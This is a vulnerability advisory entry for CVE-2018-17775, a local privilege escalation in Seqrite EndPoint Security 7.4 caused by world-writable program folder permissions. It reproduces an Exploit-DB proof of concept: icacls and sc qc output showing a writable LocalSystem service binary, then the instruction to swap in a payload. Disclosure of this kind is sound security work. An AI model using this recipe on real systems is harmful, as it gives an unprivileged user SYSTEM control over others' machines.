Quick Heal Technologies Seqrite EndPoint Security security vulnerability

Vulnerability ID 1345931 Vulnerability type Permission, privilege and access control issue
Published 2018-10-09 Updated 2019-10-23
CVE ID CVE-2018-17775 CNNVD ID CNNVD-201810-283
Platform Windows CVSS score N/A
|Source
https://www.exploit-db.com/exploits/45568
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201810-283
|Details
Quick Heal Technologies Seqrite EndPoint Security (EPS) is an endpoint security solution from the Indian company Quick Heal Technologies. The product provides device control, vulnerability scanning, patch management and asset management. Quick Heal Technologies EPS 7.4 contains a security vulnerability: the program assigns the "Everyone: (F)" permission to the %PROGRAMFILES%\Seqrite\Seqrite folder. A local attacker can exploit this to escalate privileges by replacing an executable with a malicious file.
|Exploit
# Exploit Title: Seqrite End Point Security 7.4 - Privilege Escalation
# Date: 2018-09-13
# Exploit Author: Hashim Jawad - @ihack4falafel
# Vendor Homepage: https://www.seqrite.com/
# Tested on: Windows 7 Enterprise SP1 (x64)
# CVE: CVE-2018-17775

# Description:
# Seqrite End Point Security v7.4 installs by default to "C:\Program Files\Seqrite\Seqrite"
# with very weak folder permissions, granting any user full permission "Everyone: (F)"
# to the contents of the directory and its subfolders. In addition, the program installs a handful
# of services with binaries within the program folder that run as "LocalSystem". Given that
# the "Self Protection" feature (on by default) is disabled, which can be done in a number of ways
# (for instance, if the policy does not enforce the EPS client password to change the settings, any user
# can disable that feature), a non-privileged user would be able to
# elevate privileges to "NT AUTHORITY\SYSTEM".

# PoC

c:\>icacls "c:\Program Files\Seqrite\Seqrite"
c:\Program Files\Seqrite\Seqrite Everyone:(OI)(IO)(F)
                                 Everyone:(CI)(F)
                                 NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                 NT AUTHORITY\SYSTEM:(I)(F)
                                 NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                 BUILTIN\Administrators:(I)(F)
                                 BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                 BUILTIN\Users:(I)(RX)
                                 BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                 CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

c:\>sc qc "Core Mail Protection"

[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Core Mail Protection
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Core Mail Protection
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

c:\>icacls "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE Everyone:(I)(F)
                                              NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Administrators:(I)(F)
                                              BUILTIN\Users:(I)(RX)
                                              APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                              APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
c:\>

# Exploit:

Simply replace "EMLPROXY.EXE" with your preferred payload and wait for execution upon reboot.
|References

Source: packetstormsecurity.com

Link: https://packetstormsecurity.com/files/149586/Seqrite-End-Point-Security-7.4-Privilege-Escalation.html